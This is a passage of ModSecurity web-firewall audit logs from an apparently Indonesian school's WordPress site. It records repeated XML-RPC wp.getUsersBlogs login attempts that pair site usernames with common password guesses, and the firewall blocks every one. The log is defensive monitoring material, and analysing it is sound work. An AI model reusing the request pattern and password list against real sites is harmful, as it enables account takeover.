smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --73262517-C-- wp.getUsersBlogs kajur 123asd --73262517-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73262517-E-- --73262517-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (149+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778635035556 4844 (- - -) Stopwatch2: 1744778635035556 4844; combined=3591, p1=397, p2=3010, p3=0, p4=0, p5=106, sr=84, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73262517-Z-- --66ec3b58-A-- [16/Apr/2025:11:44:55 +0700] Z_81x0-sESiKFppgz04f1AAAAMk 103.236.140.4 42646 103.236.140.4 8181 --66ec3b58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --66ec3b58-C-- wp.getUsersBlogs kajur 123@QWE@POI --66ec3b58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66ec3b58-E-- --66ec3b58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (148+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778695172226 3924 (- - -) Stopwatch2: 1744778695172226 3924; combined=2968, p1=341, p2=2475, p3=0, p4=0, p5=88, sr=79, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66ec3b58-Z-- --c1fdb851-A-- [16/Apr/2025:11:45:41 +0700] Z_819ZVnVduWmh0dMDMYHgAAAII 103.236.140.4 42872 103.236.140.4 8181 --c1fdb851-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c1fdb851-C-- wp.getUsersBlogs kajur 1234%^&* --c1fdb851-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1fdb851-E-- --c1fdb851-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778741662940 4211 (- - -) Stopwatch2: 1744778741662940 4211; combined=3242, p1=390, p2=2684, p3=0, p4=0, p5=99, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1fdb851-Z-- --d830b803-A-- [16/Apr/2025:11:45:55 +0700] Z_82A5VnVduWmh0dMDMYOwAAAIE 103.236.140.4 42930 103.236.140.4 8181 --d830b803-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d830b803-C-- wp.getUsersBlogs kajur P@ssw0rd3 --d830b803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d830b803-E-- --d830b803-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (139+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778755086836 4406 (- - -) Stopwatch2: 1744778755086836 4406; combined=3299, p1=345, p2=2761, p3=0, p4=0, p5=109, sr=77, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d830b803-Z-- --93c59e5f-A-- [16/Apr/2025:11:46:55 +0700] Z_82Pype92T0H9-Aa0y-LwAAAEI 103.236.140.4 43236 103.236.140.4 8181 --93c59e5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --93c59e5f-C-- wp.getUsersBlogs kajur nathan --93c59e5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93c59e5f-E-- --93c59e5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (147+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778815131981 4666 (- - -) Stopwatch2: 1744778815131981 4666; combined=3619, p1=382, p2=2903, p3=0, p4=0, p5=180, sr=79, sw=154, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93c59e5f-Z-- --b013eb37-A-- [16/Apr/2025:11:47:55 +0700] Z_82e5VnVduWmh0dMDMYkAAAAJI 103.236.140.4 43524 103.236.140.4 8181 --b013eb37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b013eb37-C-- wp.getUsersBlogs kajur rangers1 --b013eb37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b013eb37-E-- --b013eb37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778875071470 4095 (- - -) Stopwatch2: 1744778875071470 4095; combined=3163, p1=354, p2=2627, p3=0, p4=0, p5=103, sr=83, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b013eb37-Z-- --411ea83a-A-- [16/Apr/2025:11:48:55 +0700] Z_82type92T0H9-Aa0y-iQAAAFM 103.236.140.4 43806 103.236.140.4 8181 --411ea83a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --411ea83a-C-- wp.getUsersBlogs kesiswaan 000000 --411ea83a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --411ea83a-E-- --411ea83a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778935141249 4257 (- - -) Stopwatch2: 1744778935141249 4257; combined=3256, p1=343, p2=2749, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --411ea83a-Z-- --4221235d-A-- [16/Apr/2025:11:49:55 +0700] Z_8285VnVduWmh0dMDMY9QAAAII 103.236.140.4 44120 103.236.140.4 8181 --4221235d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4221235d-C-- wp.getUsersBlogs kesiswaan kesiswaanPassword --4221235d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4221235d-E-- --4221235d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744778995070738 4334 (- - -) Stopwatch2: 1744778995070738 4334; combined=3325, p1=354, p2=2804, p3=0, p4=0, p5=97, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4221235d-Z-- --ffd3987f-A-- [16/Apr/2025:11:50:55 +0700] Z_83L5VnVduWmh0dMDMZJgAAAJQ 103.236.140.4 44416 103.236.140.4 8181 --ffd3987f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ffd3987f-C-- wp.getUsersBlogs kesiswaan 123789 --ffd3987f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffd3987f-E-- --ffd3987f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (147+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779055035012 4685 (- - -) Stopwatch2: 1744779055035012 4685; combined=3474, p1=391, p2=2883, p3=0, p4=0, p5=113, sr=111, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffd3987f-Z-- --012f4467-A-- [16/Apr/2025:11:51:55 +0700] Z_83aype92T0H9-Aa0y_UQAAAEc 103.236.140.4 44732 103.236.140.4 8181 --012f4467-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --012f4467-C-- wp.getUsersBlogs kesiswaan user123456 --012f4467-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --012f4467-E-- --012f4467-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (152+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779115122257 4255 (- - -) Stopwatch2: 1744779115122257 4255; combined=3215, p1=355, p2=2693, p3=0, p4=0, p5=97, sr=78, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --012f4467-Z-- --e301dc19-A-- [16/Apr/2025:11:52:40 +0700] Z_83mJVnVduWmh0dMDMZhwAAAIA 103.236.140.4 44944 103.236.140.4 8181 --e301dc19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e301dc19-C-- wp.getUsersBlogs kesiswaan 1234%^&* --e301dc19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e301dc19-E-- --e301dc19-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779160413721 4229 (- - -) Stopwatch2: 1744779160413721 4229; combined=3271, p1=340, p2=2765, p3=0, p4=0, p5=98, sr=76, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e301dc19-Z-- --55a9167e-A-- [16/Apr/2025:11:52:55 +0700] Z_83p5VnVduWmh0dMDMZkAAAAIo 103.236.140.4 45018 103.236.140.4 8181 --55a9167e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --55a9167e-C-- wp.getUsersBlogs kesiswaan z1x2c3v4 --55a9167e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55a9167e-E-- --55a9167e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779175343713 4359 (- - -) Stopwatch2: 1744779175343713 4359; combined=3393, p1=357, p2=2834, p3=0, p4=0, p5=115, sr=82, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55a9167e-Z-- --c630b37d-A-- [16/Apr/2025:11:53:55 +0700] Z_834ype92T0H9-Aa0y_zwAAAEs 103.236.140.4 45328 103.236.140.4 8181 --c630b37d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c630b37d-C-- wp.getUsersBlogs kesiswaan tinkerbell --c630b37d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c630b37d-E-- --c630b37d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779235186020 4278 (- - -) Stopwatch2: 1744779235186020 4278; combined=3335, p1=372, p2=2797, p3=0, p4=0, p5=96, sr=96, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c630b37d-Z-- --79f82506-A-- [16/Apr/2025:11:54:55 +0700] Z_84Hxk9XPLR9cFiTEvG2wAAABI 103.236.140.4 45658 103.236.140.4 8181 --79f82506-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --79f82506-C-- wp.getUsersBlogs kesiswaan bonnie --79f82506-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79f82506-E-- --79f82506-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (154+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779295263293 4356 (- - -) Stopwatch2: 1744779295263293 4356; combined=3341, p1=351, p2=2766, p3=0, p4=0, p5=155, sr=84, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79f82506-Z-- --9b85fe03-A-- [16/Apr/2025:11:55:55 +0700] Z_84W5VnVduWmh0dMDMaEgAAAJU 103.236.140.4 45990 103.236.140.4 8181 --9b85fe03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9b85fe03-C-- wp.getUsersBlogs timkreatif servmask --9b85fe03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b85fe03-E-- --9b85fe03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (154+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779355015197 4334 (- - -) Stopwatch2: 1744779355015197 4334; combined=3400, p1=376, p2=2840, p3=0, p4=0, p5=106, sr=81, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b85fe03-Z-- --824e1362-A-- [16/Apr/2025:11:56:55 +0700] Z_84lype92T0H9-Aa0zAlAAAAFg 103.236.140.4 46302 103.236.140.4 8181 --824e1362-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --824e1362-C-- wp.getUsersBlogs timkreatif marketing_ --824e1362-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --824e1362-E-- --824e1362-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744779415226535 4477 (- - -) Stopwatch2: 1744779415226535 4477; combined=3368, p1=342, 